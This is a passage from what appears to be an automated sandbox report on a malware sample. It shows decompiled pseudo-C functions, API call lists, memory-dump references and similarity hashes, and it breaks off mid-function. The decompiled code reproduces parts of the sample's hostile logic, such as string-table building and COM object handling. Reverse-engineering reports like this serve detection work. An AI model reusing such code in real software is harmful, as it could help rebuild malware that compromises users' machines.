      • Part of subcall function 03092902: SysFreeString.OLEAUT32(00000000), ref: 030929E8
    • memset.NTDLL ref: 03096C05
    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 03096C41
    • GetLastError.KERNEL32 ref: 03096C51
    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03096C62
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
    • String ID: <
    • API String ID: 593937197-4251816714
    • Opcode ID: ecaefecf2c009bd4c053858692562858290e3f67f20ec98bd576e25d11814c63
    • Instruction ID: 3dc91ff868a23946448580da705295a46c9877584087e39a3c3228b82afc69a4
    • Opcode Fuzzy Hash: ecaefecf2c009bd4c053858692562858290e3f67f20ec98bd576e25d11814c63
    • Instruction Fuzzy Hash: DE11E8B190121CAFEB00EFA9D885BE97BF8EB482A0F048417F915EB180D7759544DBA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030910DD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 50%
    			E030910DD(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x309a37c; // 0x6d69630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x309a37c; // 0x6d69630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x309a030) {
					HeapFree( *0x309a290, 0, _t8);
				}
				_t14[1] = E0309578C(_v0);
				_t11 =  *0x309a37c; // 0x6d69630
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}










    0x030910dd
    0x030910dd
    0x030910e6
    0x030910f6
    0x030910f6
    0x030910fb
    0x03091100
    0x00000000
    0x00000000
    0x030910f0
    0x030910f0
    0x03091102
    0x03091106
    0x03091118
    0x03091118
    0x03091128
    0x0309112b
    0x03091130
    0x03091134
    0x0309113a

    APIs
    • RtlEnterCriticalSection.NTDLL(06D695F0), ref: 030910E6
    • Sleep.KERNEL32(0000000A,?,?,030955D3,?,?,?,?,?,03096BD8,?,00000001), ref: 030910F0
    • HeapFree.KERNEL32(00000000,00000000,?,?,030955D3,?,?,?,?,?,03096BD8,?,00000001), ref: 03091118
    • RtlLeaveCriticalSection.NTDLL(06D695F0), ref: 03091134
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
    • String ID: Uxt
    • API String ID: 58946197-1536154274
    • Opcode ID: 6efd372f544a6e561c9001a792366e27af3011f83ce947c54b8b111e1f7f2006
    • Instruction ID: ca2f963b0076cf152e7ab663ff2f1763c50cb9ec454a74f0e946cc0c09c487a3
    • Opcode Fuzzy Hash: 6efd372f544a6e561c9001a792366e27af3011f83ce947c54b8b111e1f7f2006
    • Instruction Fuzzy Hash: 39F05E70307241AFFB25EF79E949B0A77E8BB88700B058407F951C7255C729D800DB29
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030950DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E030950DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x309a37c; // 0x6d69630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x309a37c; // 0x6d69630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x309a37c; // 0x6d69630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x309b83e) {
					HeapFree( *0x309a290, 0, _t10);
					_t7 =  *0x309a37c; // 0x6d69630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









    0x030950df
    0x030950e8
    0x030950f8
    0x030950f8
    0x030950fd
    0x03095102
    0x00000000
    0x00000000
    0x030950f2
    0x030950f2
    0x03095104
    0x03095109
    0x0309510d
    0x03095120
    0x03095126
    0x03095126
    0x0309512f
    0x03095131
    0x03095135
    0x0309513b

    APIs
    • RtlEnterCriticalSection.NTDLL(06D695F0), ref: 030950E8
    • Sleep.KERNEL32(0000000A,?,?,030955D3,?,?,?,?,?,03096BD8,?,00000001), ref: 030950F2
    • HeapFree.KERNEL32(00000000,?,?,?,030955D3,?,?,?,?,?,03096BD8,?,00000001), ref: 03095120
    • RtlLeaveCriticalSection.NTDLL(06D695F0), ref: 03095135
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
    • String ID: Uxt
    • API String ID: 58946197-1536154274
    • Opcode ID: c022ae21a8195439f86584c15a4e9f4182a248d9aa63b9e7c026ef53adba497b
    • Instruction ID: 12ac95829324ec598cc428e0a65c85caa4796ff9a69769982ba91cc7e6a19f88
    • Opcode Fuzzy Hash: c022ae21a8195439f86584c15a4e9f4182a248d9aa63b9e7c026ef53adba497b
    • Instruction Fuzzy Hash: 1DF0DAB4303200DFFB15EB29E959B1677E4BB8D701B05800BFD22C7354C739A840DA24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030939C5, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
    Download Yara Rule
    APIs
    • memcpy.NTDLL(03094A23,030970D9,00000010,?,?,?,03094A23,00000001,030970D9,00000000,?,030962B1,00000000,030970D9,?,00000000), ref: 03093A16
    • memcpy.NTDLL(00000000,00000000,06D69630,00000010), ref: 03093AA9
    • GetLastError.KERNEL32(?,?,00000010), ref: 03093B01
    • GetLastError.KERNEL32 ref: 03093B33
    • GetLastError.KERNEL32 ref: 03093B47
    • GetLastError.KERNEL32(?,?,?,03094A23,00000001,030970D9,00000000,?,030962B1,00000000,030970D9,?,00000000,030970D9,00000000,06D69630), ref: 03093B5C
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: ErrorLast$memcpy
    • String ID:
    • API String ID: 2760375183-0
    • Opcode ID: 78712e7a21498cf4c53bb5a0eddc2498cb0baa8e7e3b66f28a3ae303aaed52e6
    • Instruction ID: 0af4c07c8205a21b3c4bce0fea3e02463e17f9b8f4f8724e2cc3c1f9ba94a9b1
    • Opcode Fuzzy Hash: 78712e7a21498cf4c53bb5a0eddc2498cb0baa8e7e3b66f28a3ae303aaed52e6
    • Instruction Fuzzy Hash: 32514C75902208FFEF10DFA5DC88AAEBBB9FB44350F05846AF911E6240D7359A14EF61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03092A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
    Download Yara Rule
    C-Code - Quality: 22%
    			E03092A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03096837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E030950CA(_v16);
								goto L37;
							}
							_t103 = E03096837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x309a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















    0x03092a2a
    0x03092a31
    0x03092a36
    0x03092a39
    0x03092a40
    0x03092a43
    0x03092a46
    0x03092a4d
    0x03092a50
    0x03092ba4
    0x03092ba6
    0x03092ba8
    0x03092bad
    0x03092bad
    0x03092a56
    0x03092a59
    0x03092a5c
    0x03092a5e
    0x03092a5e
    0x03092a62
    0x00000000
    0x00000000
    0x03092a66
    0x03092a92
    0x03092a97
    0x03092a99
    0x03092a99
    0x03092a9c
    0x03092a9f
    0x03092a9f
    0x03092aa1
    0x00000000
    0x03092a6c
    0x03092a6e
    0x03092a8d
    0x03092a8d
    0x03092aa4
    0x03092aa4
    0x03092aa5
    0x03092aa5
    0x03092aa8
    0x00000000
    0x00000000
    0x00000000
    0x03092aa8
    0x03092a72
    0x03092ab9
    0x03092abd
    0x03092b97
    0x03092b99
    0x03092b99
    0x03092b9a
    0x03092b9d
    0x00000000
    0x03092b9d
    0x03092ad7
    0x03092adb
    0x03092b93
    0x00000000
    0x03092b93
    0x03092ae1
    0x03092ae4
    0x03092ae8
    0x03092aee
    0x03092af1
    0x03092b89
    0x03092b89
    0x00000000
    0x03092b8f
    0x03092afc
    0x03092b05
    0x03092b19
    0x03092b20
    0x03092b35
    0x03092b3b
    0x03092b43
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03092b45
    0x03092b45
    0x03092b45
    0x03092b4c
    0x03092b54
    0x00000000
    0x00000000
    0x03092b56
    0x03092b5f
    0x00000000
    0x00000000
    0x00000000
    0x03092b61
    0x03092b63
    0x03092b66
    0x03092b66
    0x03092b69
    0x03092b6d
    0x03092b70
    0x03092b76
    0x03092b79
    0x03092b80
    0x00000000
    0x03092afc
    0x03092a77
    0x03092a82
    0x03092a85
    0x03092a87
    0x03092a87
    0x03092a8a
    0x03092a8c
    0x00000000
    0x03092a8c
    0x03092a66
    0x03092aac
    0x03092ab1
    0x03092ab3
    0x03092ab3
    0x03092ab6
    0x03092ab6
    0x00000000

    APIs
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • lstrcpy.KERNEL32(63699BC4,00000020), ref: 03092B20
    • lstrcat.KERNEL32(63699BC4,00000020), ref: 03092B35
    • lstrcmp.KERNEL32(00000000,63699BC4), ref: 03092B4C
    • lstrlen.KERNEL32(63699BC4), ref: 03092B70
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
    • String ID:
    • API String ID: 3214092121-3916222277
    • Opcode ID: 1f50cd55e7f4ee9892719529d28c4dfe08ee6c755f8c42d3948d6b052a612594
    • Instruction ID: 527405a313c439309ff683e8c95d3035af3e77457e2e96c3916b5b310803863d
    • Opcode Fuzzy Hash: 1f50cd55e7f4ee9892719529d28c4dfe08ee6c755f8c42d3948d6b052a612594
    • Instruction Fuzzy Hash: 14517F36A0220CBFEF21DF99C584AADBBFAFF45314F19845BE8559B201C7709651EB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095F9A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E03095F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x309a2d4; // 0x3ccd5a8
				_t2 = _t22 + 0x309b662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x309a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x309a2a4 =  *0x309a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E0309283A(_t49, _t48);
					_t33 = E0309738C(_t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x309a2a4 < 5) {
							 *0x309a2a4 =  *0x309a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E03091492();
					HeapFree( *0x309a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x309a390; // 0x6d68d5d
				if(RtlAllocateHeap( *0x309a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E030946D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}















    0x03095f9a
    0x03095f9a
    0x03095fa1
    0x03095fa8
    0x03095fac
    0x03095fb1
    0x03095fbc
    0x03095fcc
    0x0309600f
    0x03096013
    0x03096017
    0x03096018
    0x0309601b
    0x03096020
    0x03096020
    0x03096023
    0x03096027
    0x03096061
    0x03096061
    0x03096067
    0x0309606e
    0x0309606e
    0x03096029
    0x0309602c
    0x0309602e
    0x0309603b
    0x0309603d
    0x03096044
    0x0309607b
    0x03096080
    0x03096082
    0x03096084
    0x03096084
    0x00000000
    0x03096082
    0x03096046
    0x0309604d
    0x0309605b
    0x00000000
    0x0309605b
    0x03095fce
    0x03095fe9
    0x03096003
    0x00000000
    0x03096003
    0x03095ffc
    0x00000000

    APIs
    • wsprintfA.USER32 ref: 03095FBC
    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03095FE1
      • Part of subcall function 030946D1: GetTickCount.KERNEL32 ref: 030946E8
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 03094735
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 03094752
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 03094772
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 03094790
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 030947B3
      • Part of subcall function 030946D1: wsprintfA.USER32 ref: 030947D4
    • HeapFree.KERNEL32(00000000,030920FA,?,?,030920FA,?), ref: 0309605B
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: wsprintf$Heap$AllocateCountFreeTick
    • String ID: Uxt
    • API String ID: 2794511967-1536154274
    • Opcode ID: a6394efe8c52b4f5b7caf027a969ec26cdcbf975befec799a68ce70fc3f31f68
    • Instruction ID: d1fb4ae05480ee1f7962f9ce1e9f61fb36c20f3ce180561aa6b8e886593dffe1
    • Opcode Fuzzy Hash: a6394efe8c52b4f5b7caf027a969ec26cdcbf975befec799a68ce70fc3f31f68
    • Instruction Fuzzy Hash: CE312B75602209EFDF01EF68D984ADB3BBCFF88350F158067E9059B240D73A9964DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0309161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
    Download Yara Rule
    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 0309165B
    • SysFreeString.OLEAUT32(00000000), ref: 0309173E
      • Part of subcall function 03096C6D: SysAllocString.OLEAUT32(030992B0), ref: 03096CBD
    • SafeArrayDestroy.OLEAUT32(?), ref: 03091792
    • SysFreeString.OLEAUT32(?), ref: 030917A0
      • Part of subcall function 03091FC2: Sleep.KERNEL32(000001F4), ref: 0309200A
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: String$AllocFree$ArrayDestroySafeSleep
    • String ID:
    • API String ID: 3193056040-0
    • Opcode ID: a2b9423f96e8f5b51b75ebe018418e439ba41bf614b4dc34c0ae6f2fafd3cee2
    • Instruction ID: d4c8cdc17f8f05fbfeefaaf38c7fa7933cf1c166c7574cd3b389270c916721a0
    • Opcode Fuzzy Hash: a2b9423f96e8f5b51b75ebe018418e439ba41bf614b4dc34c0ae6f2fafd3cee2
    • Instruction Fuzzy Hash: 4E512E76A0124AAFDF00DFE8C8848EEF7B6FF88340B15886AE515DB250D735AD45DB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03096C6D, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
    Download Yara Rule
    C-Code - Quality: 46%
    			E03096C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x309a2d4; // 0x3ccd5a8
					_t5 = _t102 + 0x309b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x30992b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x309a2d4; // 0x3ccd5a8
												_t28 = _t108 + 0x309b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x309a2d4; // 0x3ccd5a8
														_t33 = _t78 + 0x309b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































    0x03096c72
    0x03096c7b
    0x03096c7c
    0x03096c80
    0x03096c86
    0x03096c8c
    0x03096c95
    0x03096c9b
    0x03096ca5
    0x03096ca7
    0x03096cad
    0x03096cb2
    0x03096cbd
    0x03096cc5
    0x03096cc8
    0x03096deb
    0x03096cce
    0x03096cce
    0x03096cdb
    0x03096ce1
    0x03096ce7
    0x03096ceb
    0x03096cf1
    0x03096cfe
    0x03096d02
    0x03096d08
    0x03096d0b
    0x03096d11
    0x03096d17
    0x03096d1d
    0x03096d20
    0x03096d23
    0x03096d29
    0x03096d32
    0x03096d38
    0x03096d39
    0x03096d3c
    0x03096d3d
    0x03096d3e
    0x03096d46
    0x03096d47
    0x03096d48
    0x03096d4a
    0x03096d4e
    0x03096d52
    0x00000000
    0x00000000
    0x03096d58
    0x03096d61
    0x03096d67
    0x03096d71
    0x03096d75
    0x03096d77
    0x03096d84
    0x03096d88
    0x03096d90
    0x03096d95
    0x03096da7
    0x03096da9
    0x03096daf
    0x03096daf
    0x03096db8
    0x03096db8
    0x03096dba
    0x03096dc0
    0x03096dc0
    0x03096dc3
    0x03096dc9
    0x03096dcc
    0x03096dd5
    0x00000000
    0x00000000
    0x00000000
    0x03096dd5
    0x03096d29
    0x03096d23
    0x03096d0b
    0x03096ddb
    0x03096ddb
    0x03096de1
    0x03096de1
    0x03096de7
    0x03096de7
    0x03096df0
    0x03096df6
    0x03096df6
    0x03096cb2
    0x03096dff

    APIs
    • SysAllocString.OLEAUT32(030992B0), ref: 03096CBD
    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 03096D9F
    • SysFreeString.OLEAUT32(00000000), ref: 03096DB8
    • SysFreeString.OLEAUT32(?), ref: 03096DE7
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: String$Free$Alloclstrcmp
    • String ID:
    • API String ID: 1885612795-0
    • Opcode ID: 6f3e0b027b3f1511481d10c3300f90e8443fcca22b0f735ad59b4c3d91b754a6
    • Instruction ID: 28c126bd5e715a1af68dfc6a33b0b45efbf4678a89736e8d9e2ce60ce705c744
    • Opcode Fuzzy Hash: 6f3e0b027b3f1511481d10c3300f90e8443fcca22b0f735ad59b4c3d91b754a6
    • Instruction Fuzzy Hash: 50514C75D01519DFDF00DBA8C8888EEF7B9FF88314B15459AE915AB214D7329D01CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03095D93, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E03095D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E030928F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E03091000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03093915(_t101,  &_v428, _a8, _t96 - _t81);
					E03093915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E03091000(_t101,  &E0309A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E03091000(_a16, _a4);
						E03093B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L03097D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L03097D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0309679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
